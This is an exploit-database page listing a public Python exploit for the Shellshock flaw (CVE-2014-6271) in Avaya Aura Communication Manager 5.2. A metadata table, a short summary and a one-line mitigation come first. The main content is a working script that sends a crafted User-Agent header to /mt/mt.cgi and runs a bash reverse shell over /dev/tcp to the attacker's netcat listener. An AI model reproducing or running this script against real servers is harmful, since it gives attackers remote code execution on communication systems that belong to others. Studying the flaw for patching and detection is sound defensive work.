header-logo
Suggest Exploit
vendor:
Avaya Aura Communication Manager
by:
Sarang Tumne a.k.a SarT
9.8
CVSS
CRITICAL
Shellshock Exploit
78
CWE
Product Name: Avaya Aura Communication Manager
Affected Version From: 5.2
Affected Version To: 5.2
Patch Exists: YES
Related CWE: CVE-2014-6271
CPE: a:avaya:aura_communication_manager
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-81e2b308-4a6c-11e4-b711-6805ca0b3d42/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3094/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3093/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-2380-1/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3092/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-512d1301-49b9-11e4-ae2c-c80aa9043978/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1354/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/hpsim-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-6277/https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=2https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=3https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=4https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=2
Other Scripts: N/A
Platforms Tested: None
2020

Avaya Aura Communication Manager 5.2 – Remote Code Execution

This exploit generates a reverse shell to a nc listener by exploiting the Shellshock vulnerability in Avaya Aura Communication Manager 5.2. It takes three arguments - Victim's IP, Attacker's IP and Reverse Shell Port.

Mitigation:

Avaya has released an advisory for this vulnerability and recommends users to upgrade to the latest version of Avaya Aura Communication Manager.
Source

Exploit-DB raw data:

# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
# Exploit Author: Sarang Tumne a.k.a SarT
# Date: 2020-02-14
# Confirmed on release 5.2
# Vendor: https://www.avaya.com/en/
# Avaya's advisory:  
# https://downloads.avaya.com/css/P8/documents/100183151
# Exploit generates a reverse shell to a nc listener (Shellshock Exploit)

###############################################

#!/usr/bin/python

import sys
import requests
 
if len(sys.argv) < 4:
	print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
	print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>" 
	print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
	print "[*] Netcat Listener: nc -lvvnp <port>"
	print "\n"
	sys.exit()

#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings() 
CM = sys.argv[1]
url = "https://" + CM + "/mt/mt.cgi"
attacker_ip = sys.argv[2]
rev_port = sys.argv[3]

http_headers = {
		
		"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
			
		}

def main():
		if len(sys.argv) == 4:
		  
		  print "[+] Success, spawning a shell on your custom port :)..."
		  requests.get(url, headers=http_headers, verify=False, timeout=5)
		
		else: 	
		  print "[-] Something went wrong, quitting..."
			
		sys.exit()
	

if __name__ == "__main__":
	main()

Navigation

Suggest Exploit

Services By CQR